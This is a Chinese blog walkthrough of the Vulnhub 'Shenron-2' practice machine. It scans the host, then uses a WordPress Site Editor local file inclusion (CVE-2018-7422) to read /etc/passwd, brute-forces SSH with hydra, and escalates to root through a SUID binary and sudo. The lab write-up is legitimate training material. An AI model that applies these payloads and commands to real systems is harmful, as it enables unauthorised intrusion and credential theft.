Vulnhub-shenron-2:神龙2靶机渗透攻略

最新推荐文章于 2024-05-22 22:35:18 发布
最新推荐文章于 2024-05-22 22:35:18 发布
阅读量3.3k 收藏 4
点赞数 2
分类专栏: vulnhub靶机通关 文章标签: 安全 linux web安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122854894
版权

下载地址
https://www.vulnhub.com/entry/shenron-2,677/
启动环境virtualbox,若启动报错更改虚拟机中usb配置为1.1即可
需要获得两个flag

信息收集

nmap扫描

nmap -sC -sV 192.168.210.220
在这里插入图片描述

发现22ssh,80和8080http

网站信息

80端口
在这里插入图片描述

暂未发现有效信息

8080端口
打开这个鬼样子,需要添加dns解析才可正常访问
在这里插入图片描述

去kali的hosts文件中添加一下域名解析
在这里插入图片描述

再访问就正常了
在这里插入图片描述

发现用wordpress5.7建站

漏洞查找

用wpscan进行扫描,直接跑跑不出来,需要带上api检测其插件
注册wpscan一个账号 https://wpvulndb.com/users/sign_up

wpscan --api-token=免费版的就行 --url=http://shenron:8080 --enumerate
在这里插入图片描述

这一次扫出不少
不一一列举了
其中有一个Site Editor编辑插件漏洞CVE-2018-7422易利用
在这里插入图片描述

CVE-2018-7422漏洞利用

searchsploit wordpress Site Editor
找一下漏洞库
发现存在利用方式
在这里插入图片描述

复制出来查看如何利用
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

http://shenron:8080/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

成功读取文件
在这里插入图片描述

发现两个用户jenny和shenron

ssh爆破

hydra -L user.txt -P wordlist.txt 192.168.210.220 ssh -V -f -t 4
在这里插入图片描述

发现账密jenny jenny
在这里插入图片描述

成功登入jenny
在这里插入图片描述

提权

查找一下suid权限
find / -perm -4000 2>/dev/null l
有一个execute这是一个二进制文件
在这里插入图片描述

逆向Execute

使用Ghidra工具进行逆向
工具下载地址:https://github.com/NationalSecurityAgency/ghidra
使用方法参考:https://www.wangan.com/docs/635
在这里插入图片描述

脚本执行流程为 1.将bash拷贝到/mnt下 2.赋予/mnt/bash 777的权限 3.吧文件所属者所属组都改为shenron用户 4.给/mnt/bash suid权限
综上可知 我们执行execute可以获取一个有shenron权限的/mnt/bash

执行/usr/bin/Execute发现成功生成bash
在这里插入图片描述

./bash -p 拿到shenron权限
在这里插入图片描述

在shenron家目录中发现flag1和一串密文
在这里插入图片描述

40252f8ffc3932fd2b5ae4995defb92
base32解码 得到shenron账户密码为 ShEnRoNShEnRoNShEnRoNShEnRoNShEnRoN@ShEnRoN#ShEnRoNPaSsWoRd
在这里插入图片描述

切换到shenron,发现可以用sudo执行任何身份的命令
在这里插入图片描述

sudo su root 切换到root,在root家目录中发现flag2.通关!
在这里插入图片描述

Forest深林
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1426
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
JimWu的博客
09-05 1267
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 难易程度:★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite 1.打开靶场,找到登录,点击进去。 2.尝试弱口令登录,都失败了,知道账号为admin。 没有验证码,打开burpsuite,尝试暴力破解。 3.得到密码为123qwe。 4.该漏洞为Activity Monitor插件远程命令执行漏...
靶机渗透练习47-dpwwn-02
hirak0的博客
04-19 1927
靶机描述 靶机地址:https://www.vulnhub.com/entry/dpwwn-2,343/ About Release Name: dpwwn-02 Date release: 09 Aug 2019 Author: Debashis Pal Series: dpwwn Description This boot2root is a linux based virtual machine and has been tested using VMware workstation. Diffic
春秋云镜 CVE-2018-7422
qq_22002773的博客
08-25 474
春秋云镜 CVE-2018-7422
春秋云境CVE-2018-7422
最新发布
2303_76653367的博客
05-22 398
WordPress Plugin Site Editor LFI
VulnHub】Acid靶场复盘
redwand的博客
03-15 5746
靶机要点,一、CTF常见的目录提示方式。二、提权过程中用户文件遍历。三、sudo配置不当提权。
CVE-2018-2894 weblogic 任意文件上传漏洞复现
u013224189的专栏
07-25 3534
CVE-2018-2894 weblogic任意文件上传漏洞 2018年7月19日,CNCERT发出漏洞预警,weblogic存在远程代码执行高危漏洞,本质上为任意文件上传漏洞,有两处上传点: /ws_utc/config.do /ws_utc/begin.do 影响版本:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。 漏洞作者就是我的小基友,所以我 来尝试复...
game-in1-rawi-olavM
04-07
该游戏是基于鹿特丹Emmauscollege的4HV模板 我的游戏:游戏名称 由...制作: 奥拉夫v迈登 拉威·比达尔(Rawi ... NPC的列表:BHead(重设世界),Shenron(如果您将7个特殊物品放在一起,他会给他一个愿望),Liqu
DBS TCG Quick Search-crx插件
04-04
在CardMarket或TCGPlayer上搜索卡,即可快速访问Meta Decks,DBS Decks主页和Shenron的Lair DB。 将卡名称放在搜索栏上,然后按Enter键,您将被重定向到CardMarket(EU)或TCGPlayer(USA / CA / NZ / AU)。 按DBS ...
CVE-2018-8174漏洞复现及内网渗透攻击
Waldocsdn的博客
03-12 2519
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Win server 2008 对Windows 7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows 7进攻Windows server 2008...
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 -墨者学院
小白鸽
07-31 1938
01 背景介绍 近日,WordPress 插件Plainview Activity Monitor被曝出存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。 远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。 02 影响范围 Plainview Activity Monitor plugin version <= 20161228 03 利用方式 默认后台 wp-login.php Activity
WordPress Browser Rejector 插件"wppath"远程文件包含漏洞
weixin_30478619的博客
01-11 138
漏洞版本: WordPress Browser Rejector 2.x 漏洞描述: Browser Rejector可以提示或阻止用户使用旧版本的Web浏览器。 Browser Rejector 2.10及之前版本没有正确验证wp-content/plugins/browser-rejector/rejectr.js.php内的"wppath" GET参数,可被利用包含本...
wordpress4.9漏洞
小小猪的博客
12-01 8111
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
mysql 5.2安全漏洞_MySQL远程安全漏洞CVE-2018-2775 5.7.21之前所有版本受影响
weixin_39672443的博客
01-19 1229
近日,Oracle MySQL爆出远程安全漏洞,CVE编号CVE-2018-2775,SecurityFocus称Oracle MySQL服务器在“Server: Optimizer”组件中容易出现远程安全漏洞,该漏洞可以通过“MySQL”协议利用。MySQL 5.7.21之前所有版本受影响。SecurityFocus及Oracle发布预警通告,相关信息如下推荐阅读:CVE-2018-2775漏洞...
18年远程cve漏洞及利用对应exp
weixin_42373409的博客
09-14 834
CVE-2018-2628 Oracle Weblogic Server Deserialization RCE CVE-2018-2628 https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize CVE-2018-10933 libSSH Auth Bypass Exploit CVE-2018-10933 https://paper.seebug.org/720/https://github.com/.
Drupal 远程代码执行漏洞(CVE-2018-7602)漏洞复现
ADummy的博客
02-23 1013
Drupal 远程代码执行漏洞(CVE-2018-7602) by ADummy 0x00利用路线 ​ poc直接打 0x01漏洞介绍 ​ 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。 影响版本 Drupal < 7.58 Drupal < 8.3.9 Drupal < 8.4.6 Drupal < 8.5.1 0x02漏洞复现 exp地址:pi
SHENRON-1(神龙靶机
m0_66299232的博客
09-29 672
就是为了让两个linux机器之间使用ssh不需要用户名和密码。常规我们ssh连接到其他服务器的时候是需要输入密码的,这个文件中可以实现你的免密登录连接,只需要两步操作:1、在要被连接的目标服务器上生成 ssh 公钥 xxx.pub2、将远程服务器上生成的 xxx.pub 中的内容,拷贝到当前服务器的 ~/.ssh/authorized_keys 中这样再进行 ssh 连接目标服务器的时候,就不会提示输入密码了,结果是直接连接成功生成公私钥(2)创建公私钥。
vulnhub--shenron: 3
venu_s的博客
08-12 417
靶机介绍 Goal: Get two flags Difficult: Beginner Download:https://www.vulnhub.com/entry/shenron-3,682/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.176 目录扫描 gobuster dir -u http://192.168.187.176 -x "php,txt,zip,b
[Vulfocus解题系列] WordPress远程命令执行(CVE-2016-10033)
00勇士王子的博客
07-07 2284
漏洞介绍 名称: wordpress 远程代码执行 (CVE-2016-10033) 描述: WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。 影响版本 WordPr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值